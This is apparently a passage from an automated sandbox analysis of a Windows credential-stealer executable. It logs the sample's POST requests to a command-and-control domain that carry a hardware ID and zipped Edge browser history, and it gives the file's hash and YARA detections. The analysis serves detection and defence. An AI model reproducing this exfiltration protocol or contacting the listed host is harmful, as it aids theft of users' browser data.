                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=44Ma5%2BUFjnKWXb0pIxEmMC%2BTzS64JIq3MakN3%2BJKkccw3yCTukLOO3D8Wf%2BKozSDiP81YLRhRhAQy8wPYzzKVrm6htgdoC3BJdVZr%2BVLiDfY3koqeJJOU8GM%2BeSd0YC4ugS%2BAxVC0mrOEqk%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8a896cdb38c46a55-EWR
                      alt-svc: h3=":443"; ma=86400
                      2024-07-25 04:32:17 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                      Data Ascii: eok 8.46.123.33
                      2024-07-25 04:32:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session ID:3
                      Source IP:192.168.2.5
                      Source Port:49707
                      Destination IP:188.114.97.3
                      Destination Port:443
                      PID:4424
                      Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-07-25 04:32:18 UTC | 290 | OUT | POST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 16230
                      Host: resergvearyinitiani.shop
                      2024-07-25 04:32:18 UTC | 15331 | OUT | Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E766BAC592C4992C9DFAF2EF704A2C7E--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
                      2024-07-25 04:32:18 UTC | 899 | OUT | Data Ascii: )|"leveldb.BytewiseComparatorPKP{.)PKMQEdge/BrowserVersion.txtPK4% WEdge/dp.txtPKA`Edge/Default/HistoryP
                      2024-07-25 04:32:18 UTC | 814 | IN | HTTP/1.1 200 OK
                      Date: Thu, 25 Jul 2024 04:32:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Set-Cookie: PHPSESSID=tvaie8e7np4v55tfjbbpieodo7; expires=Sun, 17-Nov-2024 22:18:57 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ungpe2jr3vhQPs4pnTtDQLaGR3O3bY2Lg3X%2F6LNcLq7ROfPSA1kd84%2FkOpvIZ2WL1m5XsTbR1ju69Z41%2BbJ2R44HdTnya9WCnpByAZp%2BWVaQxvY8cQlHAqwU%2BtLSUn6tDg1UyE4uv6888yo%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8a896ce21f3b43b0-EWR
                      alt-svc: h3=":443"; ma=86400
                      2024-07-25 04:32:18 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                      Data Ascii: eok 8.46.123.33
                      2024-07-25 04:32:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session ID:4
                      Source IP:192.168.2.5
                      Source Port:49708
                      Destination IP:188.114.97.3
                      Destination Port:443
                      PID:4424
                      Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-07-25 04:32:19 UTC | 290 | OUT | POST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 20574
                      Host: resergvearyinitiani.shop
                      2024-07-25 04:32:19 UTC | 15331 | OUT | Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E766BAC592C4992C9DFAF2EF704A2C7E--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
                      2024-07-25 04:32:20 UTC | 818 | IN | HTTP/1.1 200 OK
                      Date: Thu, 25 Jul 2024 04:32:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Set-Cookie: PHPSESSID=c7pb7c3u16vkao5r86e4pqc5cu; expires=Sun, 17-Nov-2024 22:18:59 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uQhEWhaQdY%2BCBldaCZ8mh6S48QP9Bn22xeoc%2BGUuegnFQuyTlrzUB6wkuIaMErxP5WLsNTwHF9vtFow%2FYpzQl68gljzn3WTyzsunL%2F0El8pKf%2Foaig2Dhnpd9yvgx%2BsqoS2ItD%2FYrkyRsbM%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8a896ceccb0f42e8-EWR
                      alt-svc: h3=":443"; ma=86400
                      2024-07-25 04:32:20 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                      Data Ascii: eok 8.46.123.33
                      2024-07-25 04:32:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session ID:5
                      Source IP:192.168.2.5
                      Source Port:49709
                      Destination IP:188.114.97.3
                      Destination Port:443
                      PID:4424
                      Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-07-25 04:32:22 UTC | 289 | OUT | POST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 1286
                      Host: resergvearyinitiani.shop
                      2024-07-25 04:32:22 UTC | 1286 | OUT | Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E766BAC592C4992C9DFAF2EF704A2C7E--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
                      2024-07-25 04:32:22 UTC | 808 | IN | HTTP/1.1 200 OK
                      Date: Thu, 25 Jul 2024 04:32:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Set-Cookie: PHPSESSID=uaicjeoiojqb22t7kahfm46d6b; expires=Sun, 17-Nov-2024 22:19:01 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iweAvyIemaEeFKXqOkfOrbeISRSJ9YKtUt6wb6fOmmzpXHZt3FBfSMSqE8K8oWpmrUNQ8LJkUy1NdjjaynfLcQ5AKP8ZulBaDLfvOH7msDkKvSjP4wKvr%2F8vaF41Ub5WVv3MN%2BRETTbsWTs%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8a896cfc28a22365-EWR
                      alt-svc: h3=":443"; ma=86400
                      2024-07-25 04:32:22 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                      Data Ascii: eok 8.46.123.33
                      2024-07-25 04:32:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session ID:6
                      Source IP:192.168.2.5
                      Source Port:49710
                      Destination IP:188.114.97.3
                      Destination Port:443
                      PID:4424
                      Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-07-25 04:32:23 UTC | 291 | OUT | POST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 572993
                      Host: resergvearyinitiani.shop
                      2024-07-25 04:32:23 UTC | 15331 | OUT | Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E766BAC592C4992C9DFAF2EF704A2C7E--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
                      2024-07-25 04:32:27 UTC812INHTTP/1.1 200 OK
                      Date: Thu, 25 Jul 2024 04:32:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Set-Cookie: PHPSESSID=0rrjfgsl3nl6rtgafqcoabrpa7; expires=Sun, 17-Nov-2024 22:19:04 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TfrM2rxIwhQKT%2B9vYy5QyQ5RYO1uuPOkWSNEDxeDZiXDhwNgYNuHHBGm5Tmwv7WfbyxF3KW5%2FV%2FaIN38jnQc%2BjnUFdCFlzb4ObzPTTA9SNHKKPCVJx2Adblp6fpdbvNOTw1OA51KH6R5L1Y%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8a896d052f059dff-EWR
                      alt-svc: h3=":443"; ma=86400


                      Target ID:0
                      Start time:00:32:11
                      Start date:25/07/2024
                      Path:C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe"
                      Imagebase:0xaa0000
                      File size:6'602'847 bytes
                      MD5 hash:A2860DB7149C32113AE0E57F4B3AB327
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2095048923.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2095154387.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      No disassembly